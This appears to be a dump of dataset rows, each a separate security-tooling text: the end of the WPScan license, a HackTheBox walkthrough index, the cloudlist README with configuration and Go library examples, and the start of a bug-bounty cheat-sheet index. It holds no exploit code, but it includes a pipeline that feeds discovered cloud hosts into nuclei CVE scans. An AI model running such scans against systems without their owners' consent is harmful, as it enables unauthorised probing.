6. Contributions\n\nAny Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content.\n\n### 7. Support\n\nWPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team.\n\n### 8. Disclaimer of Warranty\n\nWPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing.\n\n### 9. Limitation of Liability\n\nTo the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services.\n\n### 10. Disclaimer\n\nRunning WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan.\n\n### 11. Trademark\n\nThe \"wpscan\" term is a registered trademark. This License does not grant the use of the \"wpscan\" trademark or the use of the WPScan logo.\n"}}},{"rowIdx":670,"cells":{"text":{"kind":"string","value":"# HackTheBox CTF Cheatsheet\n\nThis cheatsheet is aimed at CTF players and beginners to help them sort Hack The Box Labs on the basis of operating system and difficulty. This list contains all the Hack The Box writeups available on hackingarticles. We have performed and compiled this list based on our experience. Please share this with your connections and direct queries and feedback to [Hacking Articles](https://twitter.com/hackinarticles).\n\n[1.5]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/linked.png\n[1.6]: https://www.linkedin.com/company/hackingarticles/\n[1.3]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/discord.png\n[1.4]: https://discord.com/invite/kyKvXwK4Bk\n[1.1]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/twitter.png\n[1]: http://www.twitter.com/hackinarticles\n# Follow us on [![alt text][1.1]][1] [![alt text][1.3]][1.4] [![alt text][1.5]][1.6]\n\n![image](https://github.com/Ignitetechnologies/HackTheBox-CTF-Writeups/blob/master/htb.png?raw=true)\n\n| No. | Machine Name | Operating System | Difficulty |\n|-----|--------------|------------------|------------------|\n| 1.\t| [Access](https://www.hackingarticles.in/hack-the-box-access-walkthrough/)|Windows|Easy|\n| 2.\t| [Active](https://www.hackingarticles.in/hack-the-box-active-walkthrough/)|Windows|Easy|\n| 3.\t| [Apocalyst](https://www.hackingarticles.in/hack-the-box-challenge-apocalyst-walkthrough/)|Linux|Medium|\n| 4.\t| [Aragog](https://www.hackingarticles.in/hack-the-box-aragog-walkthrough/)|Linux|Medium|\n| 5.\t| [Arctic](https://www.hackingarticles.in/hack-the-box-challenge-arctic-walkthrough/)|Windows|Easy|\n| 6.\t| [Ariekei](https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/)|Linux|Insane|\n| 7.\t| [Bank](https://www.hackingarticles.in/hack-the-box-challenge-bank-walkthrough/)|Linux|Easy|\n| 8.\t| [Bart](https://www.hackingarticles.in/hack-the-box-bart-walkthrough/)|Windows|Medium|\n| 9.\t| [Bashed](https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/)|Linux|Easy|\n| 10.\t| [Beep](https://www.hackingarticles.in/hack-the-box-challenge-beep-walkthrough/)|Linux|Easy|\n| 11.\t| [Blocky](https://www.hackingarticles.in/hack-the-box-challenge-blocky-walkthrough/)|Linux|Easy|\n| 12.\t| [Blue](https://www.hackingarticles.in/hack-the-box-challenge-blue-walkthrough/)|Windows|Easy|\n| 13.\t| [Bounty](https://www.hackingarticles.in/hack-the-box-bounty-walkthrough/)|Windows|Easy|\n| 14.\t| [Brainfuck](https://www.hackingarticles.in/hack-the-box-challenge-brainfuck-walkthrough/)|Linux|Insane|\n| 15.\t| [Calamity](https://www.hackingarticles.in/hack-the-box-challenge-calamity-walkthrough/)|Linux|Hard|\n| 16.\t| [Canape](https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/)|Linux|Medium|\n| 17.\t| [Carrier](https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/)|Linux|Medium|\n| 18.\t| [Celestial](https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/)|Linux|Medium|\n| 19.\t| [Charon](https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/)|Linux|Hard|\n| 20.\t| [Chatterbox](https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/)|Windows|Medium|\n| 21.\t| [Crimestoppers](https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/)|Windows|Hard|\n| 22.\t| [Cronos](https://www.hackingarticles.in/hack-the-box-challenge-cronos-walkthrough/)|Linux|Hard|\n| 23.\t| [Curling](https://www.hackingarticles.in/hack-the-box-curling-walkthrough/)|Linux|Easy|\n| 24.\t| [Dab](https://www.hackingarticles.in/hack-the-box-dab-walkthrough/)|Linux|Hard|\n| 25.\t| [Devel](https://www.hackingarticles.in/hack-the-box-challenge-devel-walkthrough/)|Windows|Easy|\n| 26.\t| [DevOops](https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/)|Linux|Medium|\n| 27.\t| [Dropzone](https://www.hackingarticles.in/hack-the-box-dropzone-walkthrough/)|Windows|Hard|\n| 28.\t| [Enterprise](https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/)|Linux|Medium|\n| 29.\t| [Europa](https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/)|Linux|Medium|\n| 30.\t| [Falafel](https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/)|Linux|Hard|\n| 31.\t| [Fighter](https://www.hackingarticles.in/hack-the-box-fighter-walkthrough/)|Windows|Insane|\n| 32.\t| [Fluxcapacitor](https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/)|Linux|Medium|\n| 33.\t| [FriendZone](https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/)|Linux|Easy|\n| 34.\t| [Frolic](https://www.hackingarticles.in/hack-the-box-frolic-walkthrough/)|Linux|Easy|\n| 35.\t| [Fulcurm](https://www.hackingarticles.in/hack-the-box-fulcrum-walkthrough/)|Linux|Easy|\n| 36.\t| [Giddy](https://www.hackingarticles.in/hack-the-box-giddy-walkthrough/)|Windows|Medium|\n| 37.\t| [Grandpa](https://www.hackingarticles.in/hack-the-box-challenge-grandpa-walkthrough/)|Windows|Easy|\n| 38.\t| [Granny](https://www.hackingarticles.in/hack-the-box-challenge-granny-walkthrough/)|Windows|Easy|\n| 39.\t| [Haircut](https://www.hackingarticles.in/hack-the-box-challenge-haircut-walkthrough/)|Linux|Medium|\n| 40.\t| [Hawk](https://www.hackingarticles.in/hack-the-box-hawk-walkthrough/)|Linux|Medium|\n| 41.\t| [Help](https://www.hackingarticles.in/hack-the-box-help-walkthrough/)|Linux|Easy|\n| 42.\t| [Holiday](https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/)|Linux|Hard|\n| 43.\t| [Inception](https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/)|Linux|Medium|\n| 44.\t| [Irked](https://www.hackingarticles.in/hack-the-box-irked-walkthrough/)|Linux|Easy|\n| 45.\t| [Jail](https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/)|Linux|Insane|\n| 46.\t| [Jeeves](https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/)|Windows|Medium|\n| 47.\t| [Jerry](https://www.hackingarticles.in/hack-the-box-jerry-walkthrough/)|Windows|Easy|\n| 48.\t| [Joker](https://www.hackingarticles.in/hack-the-box-challenge-joker-walkthrough/)|Linux|Hard|\n| 49.\t| [Kotarak](https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/)|Linux|Hard|\n| 50.\t| [Lame](https://www.hackingarticles.in/hack-the-box-challenge-lame-walkthrough/)|Linux|Easy|\n| 51. | [Lazy](https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/)|Linux|Medium|\n| 52.\t| [Legacy](https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/)|Windows|Easy|\n| 53.\t| [Lightweight](https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/)|Linux|Medium|\n| 54.\t| [Mantis](https://www.hackingarticles.in/hack-the-box-challenge-mantis-walkthrough/)|Windows|Hard|\n| 55.\t| [Minion](https://www.hackingarticles.in/hack-the-box-minion-walkthrough/)|Windows|Insane|\n| 56.\t| [Mirai](https://www.hackingarticles.in/hack-the-box-challenge-mirai-walkthrough/)|Linux|Easy|\n| 57.\t| [Mischief](https://www.hackingarticles.in/hack-the-box-mischief-walkthrough/)|Linux|Insane|\n| 58.\t| [Netmon](https://www.hackingarticles.in/hack-the-box-netmon-walkthrough/)|Windows|Easy|\n| 59.\t| [Nibble](https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/)|Linux|Easy|\n| 60.\t| [Nightmare](https://www.hackingarticles.in/hack-nightmare-vm-ctf-challenge/)|Linux|Insane|\n| 61.\t| [Nineveh](https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/)|Linux|Medium|\n| 62.\t| [Node](https://www.hackingarticles.in/hack-the-box-challenge-node-walkthrough/)|Linux|Medium|\n| 63.\t| [October](https://www.hackingarticles.in/hack-the-box-october-walkthrough/)|Linux|Medium|\n| 64.\t| [Olympus](https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/)|Linux|Medium|\n| 65.\t| [Optimum](https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/)|Windows|Easy|\n| 66.\t| [Poison](https://www.hackingarticles.in/hack-the-box-poison-walkthrough/)|FreeBSD|Medium|\n| 67.\t| [Popcorn](https://www.hackingarticles.in/hack-the-box-challenge-popcorn-walkthrough/)|Linux|Medium|\n| 68.\t| [SecNotes](https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/)|Windows|Medium|\n| 69.\t| [Sense](https://www.hackingarticles.in/hack-the-box-challenge-sense-walkthrough/)|FreeBSD|Easy|\n| 70.\t| [Shocker](https://www.hackingarticles.in/hack-the-box-challenge-shocker-walkthrough/)|Linux|Easy|\n| 71.\t| [Shrek](https://www.hackingarticles.in/hack-the-box-challenge-shrek-walkthrough/)|Linux|Hard|\n| 72.\t| [Silo](https://www.hackingarticles.in/hack-the-box-silo-walkthrough/)|Windows|Medium|\n| 73.\t| [Sneaky](https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/)|Linux|Medium|\n| 74.\t| [Solid State](https://www.hackingarticles.in/hack-the-box-challenge-solid-state-walkthrough/)|Linux|Medium|\n| 75.\t| [Stratosphere](https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/)|Linux|Medium|\n| 76.\t| [Sunday](https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/)|Solaris|Easy|\n| 77.\t| [Tally](https://www.hackingarticles.in/hack-the-box-challenge-tally-walkthrough/)|Windows|Hard|\n| 78.\t| [TartarSauce](https://www.hackingarticles.in/hack-the-box-tartarsauce-walkthrough/)|Linux|Medium|\n| 79.\t| [Teacher](https://www.hackingarticles.in/hack-the-box-teacher-walkthrough/)|Linux|Easy|\n| 80.\t| [Tenten](https://www.hackingarticles.in/hack-the-box-challenge-tenten-walkthrough/)|Linux|Medium|\n| 81.\t| [Valentine](https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/)|Linux|Easy|\n| 82.\t| [Vault](https://www.hackingarticles.in/hack-the-box-vault-walkthrough/)|Linux|Medium|\n| 83.\t| [Waldo](https://www.hackingarticles.in/hack-the-box-waldo-walkthrough/)|Linux|Medium|\n| 84.\t| [Ypuffy](https://www.hackingarticles.in/hack-the-box-ypuffy-walkthrough/)|Others|Medium|\n| 85.\t| [Zipper](https://www.hackingarticles.in/hack-the-box-zipper-walkthrough/)|Linux|Hard|\n| 86. | [Luke](https://www.hackingarticles.in/hack-the-box-luke-walkthrough/)|Linux|Easy|\n| 87. | [Bastion](https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/)|Windows|Easy|\n| 88. | [Heist](https://www.hackingarticles.in/hack-the-box-heist-walkthrough/) | Windows | Medium |\n| 89. | [Bitlab](https://www.hackingarticles.in/hack-the-box-challenge-bitlab-walkthrough/) | Linux | Medium |\n| 90. | [Jarvis](https://www.hackingarticles.in/hack-the-box-jarvis-walkthrough/) | Linux | Medium |\n| 91. | [Writeup](https://www.hackingarticles.in/hack-the-box-writeup-walkthrough/) | Linux | Easy |\n| 92. | [Networked](https://www.hackingarticles.in/hack-the-box-networked-walkthrough/) | Linux | Medium |\n| 93. | [Haystack](https://www.hackingarticles.in/hack-the-box-haystack-walkthrough/) | Linux | Medium |\n| 94. | [Postman](https://www.hackingarticles.in/hack-the-box-postman-walkthrough/) | Linux | Easy |\n| 95. | [Wall](https://www.hackingarticles.in/hack-the-box-wall-walkthrough/)| Linux | Medium |\n| 96. | [Open Admin Box](https://www.hackingarticles.in/hack-the-box-open-admin-box-walkthrough/)| Linux | Easy |\n| 97. | [Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough/)| Windows | Medium |\n| 98. | [Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)| Windows | Easy |\n| 99. | [Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)| Windows | Hard |\n| 100. | [Tabby](https://www.hackingarticles.in/tabby-hackthebox-walkthrough/)| Linux | Easy |\n| 101. | [Omni](https://www.hackingarticles.in/omni-hackthebox-walkthrough/)| Windows | Easy |\n| 102. | [Mango](https://www.hackingarticles.in/mango-hackthebox-walkthrough/)| Linux | Medium |\n| 103. | [Servmon](https://www.hackingarticles.in/servmon-hackthebox-walkthrough/)| Windows | Easy |\n| 104. | [Bastard](https://www.hackingarticles.in/bastard-hackthebox-walkthrough/)| Windows | Medium |\n| 105. | [Cascade](https://www.hackingarticles.in/cascade-hackthebox-walkthrough/)| Windows | Medium |\n| 106. | [Traverxec](https://www.hackingarticles.in/traverxec-hackthebox-walkthrough/)| Linux | Easy |\n| 107. | [Forest](https://www.hackingarticles.in/forest-hackthebox-walkthrough/)| Windows | Easy |\n| 108. | [Admirer](https://www.hackingarticles.in/admirer-hackthebox-walkthrough/)| Linux | Easy |\n| 109. | [Blunder](https://www.hackingarticles.in/blunder-hackthebox-walkthrough/)| Linux | Easy |\n| 110. | [SwagShop](https://www.hackingarticles.in/swagshop-hackthebox-walkthrough/)| Linux | Easy |\n| 111. | [Doctor](https://www.hackingarticles.in/doctor-hackthebox-walkthrough/)| Linux | Easy |\n| 112. | [Fuse](https://www.hackingarticles.in/fuse-hackthebox-walkthrough/)| Windows | Medium |\n| 113. | [LaCasaDePapel](https://www.hackingarticles.in/lacasadepapel-hackthebox-walkthrough/)| Linux | Easy |\n| 114. | [Magic](https://www.hackingarticles.in/magic-hackthebox-walkthrough/)| Linux | Medium |\n| 115. | [Traceback](https://www.hackingarticles.in/traceback-hackthebox-walkthrough/)| Linux | Easy |\n| 116. | [Remote](https://www.hackingarticles.in/remote-hackthebox-walkthrough/)| Windows | Easy |\n| 117. | [Book](https://www.hackingarticles.in/book-hackthebox-walkthrough/)| Linux | Medium |\n| 118. | [Cache](https://www.hackingarticles.in/cache-hackthebox-walkthrough/)| Linux | Medium |\n| 119. | [OpenKeyS](https://www.hackingarticles.in/openkeys-hackthebox-walkthrough/)| OpenBSD | Medium |\n| 120. | [Chaos](https://www.hackingarticles.in/chaos-hackthebox-walkthrough/)| Linux | Medium |\n| 121. | [Querier](https://www.hackingarticles.in/querier-hackthebox-walkthrough/)| Windows | Medium |\n| 122. | [Sniper](https://www.hackingarticles.in/sniper-hackthebox-walkthrough/)| Windows | Medium |\n| 123. | [Resolute](https://www.hackingarticles.in/resolute-hackthebox-walkthrough/)| Windows | Medium |\n| 124. | [SneakyMailer](https://www.hackingarticles.in/sneakymailer-hackthebox-walkthrough/)| Linux | Medium |\n| 125. | [Nest](https://www.hackingarticles.in/nest-hackthebox-walkthrough/)| Windows | Easy |\n| 126. | [Jewel](https://www.hackingarticles.in/jewel-hackthebox-walkthrough/)| Linux | Medium |\n| 127. | [Academy](https://www.hackingarticles.in/academy-hackthebox-walkthrough/)| Linux | Medium |\n| 128. | [Passage](https://www.hackingarticles.in/passage-hackthebox-walkthrough/)| Linux | Medium |\n| 129. | [Worker](https://www.hackingarticles.in/worker-hackthebox-walkthrough/)| Windows | Medium |\n| 130. | [Delivery](https://www.hackingarticles.in/delivery-hackthebox-walkthrough/)| Linux | Medium |\n| 131. | [Time](https://www.hackingarticles.in/time-hackthebox-walkthrough/)| Linux | Medium |\n| 132. | [Ready](https://www.hackingarticles.in/ready-hackthebox-walkthrough/)| Linux | Medium |\n| 133. | [Laboratory](https://www.hackingarticles.in/laboratory-hackthebox-walkthrough/)| Linux | Easy |\n| 134. | [Luanne](https://www.hackingarticles.in/luanne-hackthebox-walkthrough/)| OpenBSD | Easy |\n| 135. | [Scriptkiddie](https://www.hackingarticles.in/scriptkiddie-hackthebox-walkthrough/)| Linux | Easy |\n| 136. | [Knife](https://www.hackingarticles.in/knife-hackthebox-walkthrough/)| Linux | Easy |\n| 137. | [Spectra](https://www.hackingarticles.in/spectra-hackthebox-walkthrough/)| Linux | Easy |\n| 138. | [Love](https://www.hackingarticles.in/love-hackthebox-walkthrough/)| Windows | Easy |\n| 139. | [Cap](https://www.hackingarticles.in/cap-hackthebox-walkthrough/)| Linux | Easy |\n| 140. | [Armageddon](https://www.hackingarticles.in/armageddon-hackthebox-walkthrough/)| Linux | Medium |\n| 141. | [TheNotebook](https://www.hackingarticles.in/thenotebook-hackthebox-walkthrough/)| Linux | Medium |\n| 142. | [Explore](https://www.hackingarticles.in/explore-hackthebox-walkthrough/)| Linux | Easy |\n| 143. | [Seal](https://www.hackingarticles.in/seal-hackthebox-walkthrough/)| Linux | Medium |\n| 144. | [BountyHunter](https://www.hackingarticles.in/bounty-hunter-hackthebox-walkthrough/)| Linux | Medium |\n| 145. | [PIT](https://www.hackingarticles.in/pit-hackthebox-walkthrough/)| Linux | Medium |\n| 146. | [Toolbox](https://www.hackingarticles.in/hackthebox-toolbox-walkthrough/)| Linux | Medium |\n| 147. | [Previse](https://www.hackingarticles.in/previse-hackthebox-walkthrough/)| Linux | Easy |\n| 148. | [Writer](https://www.hackingarticles.in/writer-hackthebox-walkthrough/)| Linux | Medium |\n| 149. | [Intelligence](https://www.hackingarticles.in/intelligence-hackthebox-walkthrough/)| Linux | Medium |\n| 150. | [Forge](https://www.hackingarticles.in/forge-hackthebox-walkthrough/)| Linux | Medium |\n| 151. | [Anubis](https://www.hackingarticles.in/anubis-hackthebox-walkthrough/)| Linux | Insane |\n| 152. | [Horizontall](https://www.hackingarticles.in/horizontall-hackthebox-walkthrough/)| Linux | Easy |\n| 153. | [Return](https://www.hackingarticles.in/return-hackthebox-walkthrough/)| Windows | Easy |\n| 154. | [Timelapse](https://www.hackingarticles.in/timelapse-hackthebox-walkthrough/)| Windows | Easy |\n| 155. | [Driver](https://www.hackingarticles.in/driver-hackthebox-walkthrough/)| Windows | Easy |\n| 156. | [Pandora](https://www.hackingarticles.in/pandora-hackthebox-walkthrough/)| Linux | Easy |\n| 157. | [Paper](https://www.hackingarticles.in/paper-hackthebox-walkthrough/)| Linux | Easy |\n| 158. | [Goodgames](https://www.hackingarticles.in/goodgames-hackthebox-walkthrough/)| Linux | Easy |\n| 159. | [Backdoor](https://www.hackingarticles.in/backdoor-hackthebox-walkthrough/)| Linux | Easy |\n| 160. | [Late](https://www.hackingarticles.in/late-hackthebox-walkthrough/)| Linux | Easy |\n| 161. | [Nunchucks](https://www.hackingarticles.in/nunchucks-hackthebox-walkthrough/)| Linux | Easy |\n| 162. | [Antique](https://www.hackingarticles.in/antique-hackthebox-walkthrough/)| Linux | Easy |\n"}}},{"rowIdx":671,"cells":{"text":{"kind":"string","value":"

\n \"cloudlist\"\n
\n

\n\n\n

\n\n\n\n\n\n\n

\n\n

\n Features •\n Installation •\n Usage •\n Configuration •\n Running cloudlist •\n Supported providers •\n Library •\n Join Discord\n

\n\n\nCloudlist is a multi-cloud tool for getting Assets (Hostnames, IP Addresses) from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n\n\n# Features\n\n

\n \"cloudlist\"\n
\n

\n\n\n - Easily list Cloud assets with multiple configurations.\n - Multiple cloud providers support.\n - Highly extensible making adding new providers a breeze.\n - **stdout** support to work with other tools in pipelines.\n\n# Usage\n\n```sh\ncloudlist -h\n```\n\nThis will display help for the tool. Here are all the switches it supports.\n\n```yaml\nUsage:\n ./cloudlist [flags]\n\nFlags:\nCONFIGURATION:\n -config string cloudlist flag config file (default \"$HOME/.config/cloudlist/config.yaml\")\n -pc, -provider-config string provider config file (default \"$HOME/.config/cloudlist/provider-config.yaml\")\n\nFILTERS:\n -p, -provider string[] display results for given providers (comma-separated)\n -id string[] display results for given ids (comma-separated)\n -host display only hostnames in results\n -ip display only ips in results\n -ep, -exclude-private exclude private ips in cli output\n\nOUTPUT:\n -o, -output string output file to write results\n -json write output in json format\n -version display version of cloudlist\n -v display verbose output\n -silent display only results in output\n```\n\n# Installation Instructions\n\n\nDownload the ready to use binary from [release page](https://github.com/projectdiscovery/cloudlist/releases/) or install/build using Go\n\n```sh\ngo install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest\n```\n\n# Running Cloudlist\n\n```\ncloudlist\n```\n\nThis will list all the assets from configured providers in the configuration file. Specific providers and asset type can also be specified using `provider` and `id` filter.\n\n```console\ncloudlist -provider aws,gcp\n\n ________ _____ __ \n / ____/ /___ __ ______/ / (_)____/ /_\n / / / / __ \\/ / / / __ / / / ___/ __/\n/ /___/ / /_/ / /_/ / /_/ / / (__ ) /_ \n\\____/_/\\____/\\__,_/\\__,_/_/_/____/\\__/ v0.0.1 \n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n[INF] Listing assets from AWS (prod) provider.\nexample.com\nexample2.com\nexample3.com\n1.1.1.1\n2.2.2.2\n3.3.3.3\n4.4.4.4\n5.5.5.5\n6.6.6.6\n[INF] Found 2 hosts and 6 IPs from AWS service (prod)\n```\n## Running cloudlist with Nuclei\n\nScanning assets from various cloud providers with nuclei for security assessments:- \n\n```bash\ncloudlist -silent | httpx -silent | nuclei -t cves/\n```\n\n# Supported providers\n\n- AWS (Amazon web services)\n - EC2\n - Route53\n- GCP (Google Cloud Platform)\n - Cloud DNS\n- DO (DigitalOcean)\n - Instances\n- SCW (Scaleway)\n - Instances\n- Fastly\n - Services\n- Heroku\n - Applications\n- Linode\n - Instances\n- Azure\n - Virtual Machines\n- Namecheap\n - Domain List\n- Alibaba Cloud\n - ECS Instances\n- Cloudflare\n - DNS\n- Hashistack\n - Nomad\n - Consul\n - Terraform\n\n\n# Configuration file\n\nThe default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml` and has the following contents as an example. In order to run this tool, the keys need to updated in the config file.\n\n```yaml\n- # provider is the name of the provider\n provider: do\n # id is the name of the provider id\n id: xxxx\n # digitalocean_token is the API key for digitalocean cloud platform\n digitalocean_token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n\n- # provider is the name of the provider\n provider: scw\n # scaleway_access_key is the access key for scaleway API\n scaleway_access_key: SCWXXXXXXXXXXXXXX\n # scaleway_access_token is the access token for scaleway API\n scaleway_access_token: xxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx\n\n- # provider is the name of the provider\n provider: aws\n # id is the name of the provider id\n id: staging\n # aws_access_key is the access key for AWS account\n aws_access_key: AKIAXXXXXXXXXXXXXX\n # aws_secret_key is the secret key for AWS account\n aws_secret_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n # aws_session_token session token for temporary security credentials retrieved via STS (optional)\n aws_session_token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n- # provider is the name of the provider (Google Cloud Platform)\n provider: gcp\n # profile is the name of the provider profile\n id: logs\n # gcp_service_account_key is the minified json of a google cloud service account with list permissions\n gcp_service_account_key: '{xxxxxxxxxxxxx}'\n- # provider is the name of the provider\n provider: azure\n # id is the name of the provider id\n id: staging\n # client_id is the client ID of registered application of the azure account (not requuired if using cli auth)\n client_id: xxxxxxxxxxxxxxxxxxxxxxxxx\n # client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth)\n client_secret: xxxxxxxxxxxxxxxxxxxxx\n # tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth)\n tenant_id: xxxxxxxxxxxxxxxxxxxxxxxxx\n #subscription_id is the azure subscription id\n subscription_id: xxxxxxxxxxxxxxxxxxx\n #use_cli_auth if set to true cloudlist will use azure cli auth\n use_cli_auth: true\n- # provider is the name of the provider\n provider: cloudflare\n # email is the email for cloudflare\n email: user@domain.com\n # api_key is the api_key for cloudflare\n api_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n- # provider is the name of the provider\n provider: heroku\n # id is the name of the provider id\n id: staging\n # heroku_api_token is the api key for Heroku account\n heroku_api_token: xxxxxxxxxxxxxxxxxxxx\n- # provider is the name of the provider\n provider: linode\n # id is the name of the provider id\n id: staging\n # linode_personal_access_token is the personal access token for linode account\n linode_personal_access_token: XXXXXXXXXXXXXXXXXXXXXXXX\n- # provider is the name of the provider\n provider: fastly\n # id is the name of the provider id\n id: staging\n # fastly_api_key is the personal API token for fastly account\n fastly_api_key: XX-XXXXXXXXXXXXXXXXXXXXXX-\n- # provider is the name of the provider\n provider: alibaba\n # id is the name of the provider id\n id: staging\n # alibaba_region_id is the region id of the resources\n alibaba_region_id: ap-XXXXXXX\n # alibaba_access_key is the access key ID for alibaba cloud account\n alibaba_access_key: XXXXXXXXXXXXXXXXXXXX\n # alibaba_access_key_secret is the secret access key for alibaba cloud account\n alibaba_access_key_secret: XXXXXXXXXXXXXXXX\n - # provider is the name of the provider\n provider: namecheap\n # id is the name of the provider id\n id: staging\n # namecheap_api_key is the api key for namecheap account\n namecheap_api_key: XXXXXXXXXXXXXXXXXXXXXXX\n # namecheap_user_name is the username of the namecheap account\n namecheap_user_name: XXXXXXX\n - # provider is the name of the provider\n provider: terraform\n # id is the name of the provider id\n id: staging\n #tf_state_file is the location of terraform state file (terraform.tfsate) \n tf_state_file: path/to/terraform.tfstate\n - # provider is the name of the provider\n provider: nomad\n # nomad_url is the url for nomad server\n nomad_url: http:/127.0.0.1:4646/\n # nomad_ca_file is the path to nomad CA file\n # nomad_ca_file: .pem\n # nomad_cert_file is the path to nomad Certificate file\n # nomad_cert_file: .pem\n # nomad_key_file is the path to nomad Certificate Key file\n # nomad_key_file: .pem\n # nomad_token is the nomad authentication token\n # nomad_token: \n # nomad_http_auth is the nomad http auth value\n # nomad_http_auth: \n- # provider is the name of the provider\n provider: consul\n # consul_url is the url for consul server\n consul_url: http://localhost:8500/\n # consul_ca_file is the path to consul CA file\n # consul_ca_file: .pem\n # consul_cert_file is the path to consul Certificate file\n # consul_cert_file: .pem\n # consul_key_file is the path to consul Certificate Key file\n # consul_key_file: .pem\n # consul_http_token is the consul authentication token\n # consul_http_token: \n # consul_http_auth is the consul http auth value\n # consul_http_auth: `\n```\n\n# Contribution\n\nPlease check [PROVIDERS.md](https://github.com/projectdiscovery/cloudlist/blob/main/PROVIDERS.md) and [DESIGN.md](https://github.com/projectdiscovery/cloudlist/blob/main/DESIGN.md) to include support for new cloud providers in Cloudlist.\n\n\n- Fork this project\n- Create your feature branch (`git checkout -b new-provider`)\n- Commit your changes (`git commit -am 'Added new cloud provider'`)\n- Push to the branch (`git push origin new-provider`)\n- Create new Pull Request\n\n# Cloudlist as a library\n\nIt's possible to use the library directly in your go programs. The following code snippets outline how to list assets from all or given cloud provider.\n\n```go\npackage main\n\nimport (\n \"context\"\n \"log\"\n\n \"github.com/projectdiscovery/cloudlist/pkg/inventory\"\n \"github.com/projectdiscovery/cloudlist/pkg/schema\"\n)\n\nfunc main() {\n inventory, err := inventory.New(schema.Options{\n schema.OptionBlock{\"provider\": \"digitalocean\", \"digitalocean_token\": \"ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242\"},\n })\n if err != nil {\n log.Fatalf(\"%s\\n\", err)\n }\n\n for _, provider := range inventory.Providers {\n resources, err := provider.Resources(context.Background())\n if err != nil {\n log.Fatalf(\"%s\\n\", err)\n }\n for _, resource := range resources.Items {\n _ = resource // Do something with the resource\n }\n }\n}\n```\n\n## Acknowledgments\n\nThank you for inspiration\n\n* [Smogcloud](https://github.com/BishopFox/smogcloud)\n* [Cloudmapper](https://github.com/duo-labs/cloudmapper)\n\n## License\n\ncloudlist is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team and licensed under [MIT](https://github.com/projectdiscovery/cloudlist/blob/main/LICENSE.md)\n"}}},{"rowIdx":672,"cells":{"text":{"kind":"string","value":"# Jeeves: stack variable overwrite\n**[SEE VIDEO WALKTHROUGH HERE](https://youtu.be/SgoCGETbnZg)**"}}},{"rowIdx":673,"cells":{"text":{"kind":"string","value":"# Bug Bounty Cheat Sheet\n\n- [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md)\n- [Books](cheatsheets/books.md)\n- [Special Tools](cheatsheets/special-tools.md)\n- [Recon](cheatsheets/recon.md)\n- [XSS](cheatsheets/xss.md)\n- [SQLI](cheatsheets/sqli.md)\n- [SSRF](cheatsheets/ssrf.md)\n- [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md)\n- [CSV Injection](cheatsheets/csv-injection.md)\n- 